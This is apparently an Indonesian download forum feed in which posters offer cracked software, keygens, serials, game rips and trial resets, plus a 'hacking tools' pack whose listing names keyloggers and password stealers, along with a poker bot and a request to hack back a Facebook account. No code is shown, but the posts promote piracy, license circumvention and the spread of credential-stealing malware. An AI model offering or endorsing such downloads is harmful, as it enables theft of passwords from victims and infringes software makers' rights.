Quote: FLV to AVI MPEG WMV 3GP MP4 iPod Converter 5.3.0402 Full Version with Serial, panjang banget ya nama softwarenya xixiixi!!? Software ini diproduksi oleh Aone-Soft yang pasti kalian sudah tau fungsinya untuk apa. Yap, FLV to AVI MPEG WMV 3GP MP4 iPod Converter 5.3.0402 dapat anda gunakan untuk mengkonvert berbagai macam format video ke format video lain. Bisa juga mengkonvert dari video menjadi format audio. Cek aja brada!!. Untuk ukuran software dengan fitur yang cukup lengkap ini ... more »

Download Kumpulan Game PC RIP FULL : TAMIYA | 51 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Game PC TAMIYA , merupakan game yang lumayan digemari oleh pencinta mobil mainan TAMIYA, game ini sangat bagusbagi brada yang suka akan ketegangan saat berkendaraan xixii!! brada bisa menetukan sulit dan mudahnya medan yang akan dijadikan arena balap mobil TAMIYA dan memilih Mobil TAMIYA yang brada sukai. Screenshot : Silahkan Brada Download : Download Kumpulan Game PC RIP FULL : TAMIYA | 51 Mb Atau pilih langsung download : Download Kumpulan Game PC RIP FULL ... more »

Download Kumpulan Game PC RIP FULL : Download Robin Hood Defender of the Crown | 193MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Download Games Robin Hood Defender of the Crown | MF Link | Genre : Action Adventure | Size : 193MB Mengambil peran Robin dan strategi penggunaan, licik, dan reflek yang cepat untuk mengalahkan Prince John, penyelamatan Raja Richard, dan menyatukan kembali Inggris. Bersama dengan bantuan Little John, Friar Tuck, Maid Marian dan band orang bergembira, Robin Hood harus menggunakan penguasaan nya panahan, pedang, jousting, dan peperangan pengepungan untuk memimpin orang-orang Inggris ... more »

Download Koleksi New 33 Hacking tools. By. Team Hacker|43.91 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Koleksi tool untuk hacking, jangan disalah gunakan yah, brada untuk pengetahuan ajah loh, kumpulan alat untuk hacking, ada 33 tools disini sebelumnya fary telah berbagi yang BIG HACK xiixxi!! , yang asyik untuk dimainkan, ingat! jgn disalahgunakan yah brada ingat loch!! itu juga kalau bisa makainya xixiixxi!! aaaaaaaaawww. KEYLOGGERS & PASSWORD STEALING: - Ardamax 2.8 - Ardamax 3.0 - Fake Messenger w/ password retriever (Revenge Messenger) - Silent Keylogger by BUNNN - ... more »

Download Game PC RIP FULL : WarCraft 3 : Reign of Chaos RIP Plus Cheat | 188MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Game Warcraft III: Reign of Chaos (War3 atau WC3) adalah sebuah game ber-genre RTS (Real Time Strategy) yang dirilis oleh Blizzard Entertainment pada bulan Juli 2002. di game ini ada 2 tambahan ras, yaitu Night Elf, dan Undead, Dan Untuk Mision Campaign nya kalian akan diceritakan berdasarkan masing-masing ras, berikut ini cerita singkatnya"Kalian disini akan menjadi arthas (human) yang merupakan tokoh utama dalm game ini, bermula ketika suatu desa di Kerajaan Lordaeron milik ras manusia ... more »

Cara Mudah Mendapatkan Chips Zynga Poker "GRATIS"

edhy.s at Your first forum - 2 bulan yang lalu
Zynga poker saat ini sedang menjadi trend di kalangan para penggila internet. Banyak orang yang rugi dan yang untung dalam permainan poker ini, sehingga banyak orang berfikir bagaimana cara mendapatkan chip dengan mudah dan praktis. Para hacker mungkin dapat dengan mudah mendapatkan chip, tetapi bagaimana dengan yang bukan hacker?Seacara logika, kita tidak mungkin bisa mendapatkan chip dengan cara mudah dan praktis. Harus ada pengorbanan untuk mendapatkannya (bermain dari meje ke meja) dan hanya ... more »

Cheat Zynga Poker

andrian at Your first forum - 2 bulan yang lalu
Liberty Bot Deluxe For Zynga Poker 1.35 ======================================= Liberty Bot Deluxe Untuk Zynga Poker adalah sebuah bot (robot) program untuk bermain Zynga Poker secara otomatis. Didalam badan program ini telah tertanam dalam berbagai mesin dan AI (Kecerdasan buatan) untuk menyederhanakan dan mendapatkan kemenangan hingga 100% (asumsi bila menggunakan mode God Of Gambler). Software ini mempunyai 4 engine bot dengan kemampuan yang berbeda. Normal, Professional, High Defense, ... more »

YouTube Downloader 3.54|2.62 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: YouTube Downloader is a free software application that's able to download videos from youtube site. YouTube Downloader allows you to very easily grab and save desired youtube video to your local computer's Hard drive. You simply paste the URL of a video into the software, press Start button, and the AVI file will be downloaded into the selected folder. As its AVI video file you can play it on the defult media player classic and you don't need to install any other video player. Latest ... more »

Download Anti Virus ESET NOD32 Antivirus & Smart Security Complete

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: ESET NOD32 Antivirus & Smart Security Complete DOWNLOAD ESET NOD32 Antivirus & Smart Security Complete ESET NOD32 Antivirus 2.70.39 ESET NOD32 Antivirus 3.0.684 ESET Smart Security 3.0.684 ESET NOD32 Antivirus v4.2.420 ESET Smart Security 4.2.40.10 Business Edition

bantu brada

riswan at Your first forum - 2 bulan yang lalu
brada fb w d hack ama org w mau ambil kembali tuh yahoo,y udah d hack juga punya aplikasi hack nggak...? nih email w brada kiranaprawira@yahoo.com mohon d bantu

Download BeFaster v4.0 Internet SpeedUp Software + Patch| 2.6 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Koneksi internet brada belum optimal! Maka brada membutuhkan koneksi internet yang lebih cepat faster. Cobalah software satu ini! Dengan BeFaster, semoga koneksi internet brada "Menjadi lebih cepat". BeFaster, sangat mudah digunakan dengan sebuah pilihan klik saja, maka koneksi internet menjadi lebih optimal. Agar optimasilisasi lebih mudah tingkat kompabilitas harus ditingkatkan. Software ini mampu mengoptimalkan semua jenis koneksi: Dial-up modem, Lan, Wireless, Cable Modem, xDSL, ... more »

Download All Drivers Windows XP , Vista , Seven , Linux , Ubuntu

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Mungkin pada kesempatan ini brada lagi bingung mencari Driver bagi Pc atau laptop brada setelah Install Ulang harus mendownload Semua Driver yang kompatible. Disini Fary akan memberi tahu Situs yang sangat kumplit yang mungkin dapat menjadi solusi download bagi brada. Silahkan brada berkunjung ke situs nya langsung cari driver yang brada inginkan free xixiixi!! . Silahkan klik link dibawah ini : http://www.x-drivers.com/

Download 2011 Portable WinAVI All In One Converter v1.6.0.4147 Full | 25 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: WinAVI All-In-One Converter - ?onvert video / audio file antara format populer! All-In-One Converter adalah converter video terbaik untuk mengkonversi video dan DVD output format. Mengkonversi hampir semua video dan audio untuk bermain mereka di PC, Portable media player, iPod dan sebagainya. WinAVI All-In-One Video Converter adalah konverter video yang terbaik dan cepat untuk mengkonversi video antara format populer seperti AVI, MPEG1 / 2, MP4, WMV, FLV, MOV, VCD / DVD,, XviD / Divx, ... more »

Download 2011 Platinum Hide IP 3.1.0.6 Full Crack | 5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Platinum Hide IP 3.1.0.6 Full Version with Crack merupakan sebuah software yang gunanya untuk mengubah IP asli (Real IP) anda menjadi IP palsu (Fake IP). Hal ini dilakukan demi keamanan berselancar didunia maya yang riskan akan spam maupun hack. Dengan Platinum Hide IP 3.1.0.6 Full Crack ini, IP asli brada akan disamarkan sehingga akan mengelabui hacker nakal yang akan menyerang IP brada xixixi!! . Catatan : 1. Platinum Hide IP 3.1.0.6 ini sudah support Firefox 5.0 2. ... more »

Memperbaiki DLL Files Dengan DLL-Files.com Fixer Full With Patch | 3.7 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: DLL-Files.com Fixer , Software ini berfungsi untuk membetulkan file .dll jika ada yang hilang. Dan juga dapat membantu brada ketika memakai software atau game ternyata file dll tidak support atau korupt coba pakai software ini. Features : * Optimize Registry in smart and invariably the simplest way. * Defrag and optimize system Registry. * Fix all the problems and create an error-free Registry. * Relieve from application, system crashes and PC hang-ups. ... more »

Download Kumpulan Game PC FULL : Bus Driver | 60 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Dalam Game Bus Driver ini, tugas Anda adalah untuk mengangkut penumpang di sekitar kota yang menarik dan realistis. Anda harus berkendara ke jadwal pada rute yang direncanakan, sementara mematuhi peraturan lalu lintas, dan mengurus untuk tidak marah atau melukai penumpang Anda. Hal ini membuat Bus Driver tidak seperti permainan mengemudi lain - pengalaman mengemudi bus sangat berbeda dari game yang ada di sirkuit balap seperti dalamke banyakan permainan mengemudi. 12 model yang berbeda ... more »

Download Kumpulan Game RIP FULL : Day of The Zombie RIP | 128 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Game Day of The Zombie ini merupakan game Ber-genre FPS Horror yang diterbitkan oleh Groove, Bercerita Tentang Pasukan zombie haus darah menyerbu kampus Fenkott Memorial! Angkatan bersenjata zachistili daerah danpenembak jitu ditempatkan di sekitar kampus sekeliling. Di tempatkejadian yang mengerikan skuad tim nasional khusus dikirim pada misi untuk mengambil Nya sepenuhnya terkendali. Sementara itu, di tengah-tengah kekacauan berdarah tigabedolag: mahasiswa, putus asa mencoba menyelamatkanpacarnya, ... more »

Download Kumpulan Game RIP FULL : Privates Zombie Cow Studios | 105 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Privates is a platform twin-stick shooter in which you lead a teeny-tiny gang of condom-hatted marines as they delve into peoples’ vaginas and bottoms and blast away at all manner of oozy, shouty monsters. It’s rude, funny, bitingly satirical and technically pretty accurate if you don’t count the tiny people or the germs with teeth. Screenshoots : Download Link Mediafire Password : www.gamehousevn.com Cara Install : Installasi : 1. Ekstrak File 2. Jalankan ... more »

Download 2011 TeraCopy Pro 2.2 Final Full Lisensi | 1.6 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: TeraCopy Pro 2.2 Full Version with Serial Key merupakan software yang konon dipercaya bisa mengoptimalkan proses pengkopian pada komputer Brada. TeraCopy Pro 2.2 Final - Full Serial Key dilengkapi dengan fitur Auto Safely Remove dan Auto Shutdown sehingga memungkinkan Brada mengatur kegiatan setelah pengkopian selesai. wew!!xiixi!!. Silahkan Brada Download : Download 2011 TeraCopy Pro 2.2 Final Full Lisensi | 1.6 Mb

Download 2011 Wondershare DemoCreator 3.5.1 Full With Keygen | 12 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Wondershare DemoCreator 3.5.1 , merupakan salah satu software yang bisa membantu brada dalam membuat demo gambar ataupun video. Wondershare DemoCreator 3.5.1 merupakan software yang bisa merekam kegiatan brada di desktop atau desktop screen recording. Fitur Wondershare DemoCreator 3.5.1 : - Make software instructional videos from desktop screen recording. - Record website guide to demonstrate online service and business. - Capture onscreen activities and publish ... more »

Download 2011 Kaspersky 2012 Trial Reset v1.1d | 156 Kb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Jika beberapa waktu lalu Fary sempat share Kaspersky 2012 Trial Reset v1.1c dan ternyata banyak yang komplain tidak bekerja, sekarang saya share lagi versi terbarunya yaitu Kaspersky 2012 Trial Reset v1.1d. Kaspersky 2012 Trial Reset v1.1d ini bisa digunakan untuk KIS/KAV 2012 and PURE v9.1.0.124. Silahkan yang pakai Kaspersky 2012 atau PURE 9.1 silahkan dicoba sendiri brada. Silahkan Brada Download : Download 2011 Kaspersky 2012 Trial Reset v1.1d | 156 Kb

Download 2011 Recover Keys 5.0.0.56 Enterprise Full With Patch 5.4 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Recover Keys 5.0.0.56 Enterprise, merupakan software yang berguna untuk membackup semua Key Lisensi Software , Recover Keys ini support dengan 3123 software dan selalu diupdate beberapa waktu. Brada bisa mengupdatenya karena kayaknya tidak bakal terblacklist. Software ini cocok bagi brada yang suka lupa dengan password Software dan lain sebagainya. Jika brada membutuhkan silahkan di download : Download 2011 Recover Keys 5.0.0.56 Enterprise | 5.4 mB Download Patch | 30 ... more »

DOWNLOAD SMADAV PRO 2011 REV.8.6.6 With Keymaker TKP Crew | 5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: SMADAV TIMHACKER KEYMAKER PRO CREW KEYGEN WITH YOUR NAME ALL VERSION Cara Menghilangkan tanda bajakan : SMADAV 8.3 isi kolom nama : anti-pembajakan dan kolom key : dikosongkan SMADAV 8.4 isi kolom nama : anti-bajakan dan kolom key : dikosongkan SMADAV 8.5 isi kolom nama : anti-bajakan dan kolom key : dikosongkan SMADAV 8.6 isi kolom nama : anti-bajakan dan kolom key : dikosongkan Sebelumnya Unregistrasi dan Uninstal SMADAV Brada. CARA BUAT KEY SMADAV DENGAN NAMA BRADA ... more »

Game PC Farm Mania 2 FULL | 77,593 KB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Farm Mania 2 Description: Do you remember a laborious country girl Anna? In Farm Mania 2 game she is back with fresh ideas. She’ll help you create your own farm and become a proprietor of a profitable business! With Anna you’ll learn all the secrets of farming industry. Farm Mania 2 is a catching sequel to the popular simulation game with elements of hidden object games. Grow vegetables and fruits, go fishing and pick up mushrooms, ranch cattle and more. If you have some ... more »

Wireless WEP Key Password Spy 1,1 FULL | 5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Perisian ini akan kembali semua kunci WEP dan password rangkaian wayarles yang telah disimpan di komputer anda. Untuk memulakan, klik? Mencari Wireless WEP Keys?. Hal ini kemudian akan memaparkan penyesuai GUID dan semua maklumat yang berkaitan dengan itu sembuh termasuk nama rangkaian wayarles (SSID), jenis enkripsi (WEP 40, WEP 104, atau WPA-PSK), dan kunci WEP yang berkaitan dengan rangkaian masing-masing. Di bahagian bawah skrin anda boleh melihat nama adapter Ethernet anda saat ... more »

Tidak ada komentar:

Posting Komentar